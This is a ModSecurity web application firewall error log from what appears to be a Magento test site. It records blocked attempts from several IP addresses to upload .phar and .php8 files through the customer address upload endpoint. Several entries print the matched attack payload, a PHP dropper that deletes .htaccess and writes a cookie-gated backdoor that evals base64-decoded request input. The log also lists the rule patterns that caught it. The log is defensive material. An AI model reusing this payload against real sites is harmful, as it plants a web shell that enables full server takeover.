[Thu Feb 19 09:27:28.028977 2026] [:error] [pid 2182757] [client 176.195.127.156:46822] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZbJcJXnj_nGDg6GJORR7wAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/m/6m88364f428d25.phar
[Thu Feb 19 09:27:28.029158 2026] [:error] [pid 2182757] [client 176.195.127.156:46822] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZbJcJXnj_nGDg6GJORR7wAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/m/6m88364f428d25.phar
[Thu Feb 19 09:27:33.595006 2026] [:error] [pid 2182753] [client 176.195.127.156:48976] [client 176.195.127.156] ModSecurity: Rule 7f633eaadbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.php8"] [unique_id "aZbJdbWXYjlgdEI-O_QRUQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 09:27:33.595721 2026] [:error] [pid 2182753] [client 176.195.127.156:48976] [client 176.195.127.156] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.php8"] [unique_id "aZbJdbWXYjlgdEI-O_QRUQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 09:27:33.600333 2026] [:error] [pid 2182753] [client 176.195.127.156:48976] [client 176.195.127.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.php8"] [unique_id "aZbJdbWXYjlgdEI-O_QRUQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 19 09:27:33.600581 2026] [:error] [pid 2182753] [client 176.195.127.156:48976] [client 176.195.127.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/m/6m88364f428d25.php8"] [unique_id "aZbJdbWXYjlgdEI-O_QRUQAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:54.432752 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Rule 7f89284babe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.phar"] [unique_id "aZfrOvW5EFO_4_f308GnggAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:54.433251 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.phar"] [unique_id "aZfrOvW5EFO_4_f308GnggAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:54.435656 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.phar"] [unique_id "aZfrOvW5EFO_4_f308GnggAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:54.435896 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.phar"] [unique_id "aZfrOvW5EFO_4_f308GnggAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:55.172424 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: cm88364f428d25.php8 found within FILES:custom_attributes[country_id]: cm88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZfrO_W5EFO_4_f308GngwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/m/cm88364f428d25.phar
[Fri Feb 20 06:03:55.173064 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZfrO_W5EFO_4_f308GngwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/m/cm88364f428d25.phar
[Fri Feb 20 06:03:55.173259 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZfrO_W5EFO_4_f308GngwAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/c/m/cm88364f428d25.phar
[Fri Feb 20 06:03:55.324672 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Rule 7f89284babe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.php8"] [unique_id "aZfrO_W5EFO_4_f308GnhAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:55.325126 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.php8"] [unique_id "aZfrO_W5EFO_4_f308GnhAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:55.327580 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.php8"] [unique_id "aZfrO_W5EFO_4_f308GnhAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Feb 20 06:03:55.327757 2026] [:error] [pid 2204542] [client 185.65.202.110:37914] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/c/m/cm88364f428d25.php8"] [unique_id "aZfrO_W5EFO_4_f308GnhAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.194869 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Rule 7f892898ebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.phar"] [unique_id "aZj4HxOcV4a2FQvOl-bHRgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.195356 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.phar"] [unique_id "aZj4HxOcV4a2FQvOl-bHRgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.198110 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.phar"] [unique_id "aZj4HxOcV4a2FQvOl-bHRgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.198308 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.phar"] [unique_id "aZj4HxOcV4a2FQvOl-bHRgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.387312 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: yl88364f428d25.php8 found within FILES:custom_attributes[country_id]: yl88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZj4HxOcV4a2FQvOl-bHRwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/l/yl88364f428d25.phar
[Sat Feb 21 01:11:11.387928 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZj4HxOcV4a2FQvOl-bHRwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/l/yl88364f428d25.phar
[Sat Feb 21 01:11:11.388099 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aZj4HxOcV4a2FQvOl-bHRwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/y/l/yl88364f428d25.phar
[Sat Feb 21 01:11:11.688189 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Rule 7f892898ebe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.php8"] [unique_id "aZj4HxOcV4a2FQvOl-bHSAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.688636 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.php8"] [unique_id "aZj4HxOcV4a2FQvOl-bHSAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.690950 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.php8"] [unique_id "aZj4HxOcV4a2FQvOl-bHSAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 01:11:11.691117 2026] [:error] [pid 2222471] [client 194.110.207.62:40296] [client 194.110.207.62] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/y/l/yl88364f428d25.php8"] [unique_id "aZj4HxOcV4a2FQvOl-bHSAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 02:28:40.155535 2026] [php:error] [pid 2222473] [client 4.197.33.200:20118] script '/var/www/magento.test.indacotrentino.com/www/pub/images/all.php' not found or unable to stat
[Sat Feb 21 20:12:59.487469 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Rule 7ffa741c5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.phar"] [unique_id "aZoDu28moWWsvSEyJlkLOAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 20:12:59.487963 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.phar"] [unique_id "aZoDu28moWWsvSEyJlkLOAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 21 20:12:59.490401 2026] [:error] [pid 2229281] [client 89.239.157.171:35398] [client 89.239.157.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/y/ay88364f428d25.phar"] [unique_id "aZoDu28moWWsvSEyJlkLOAAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
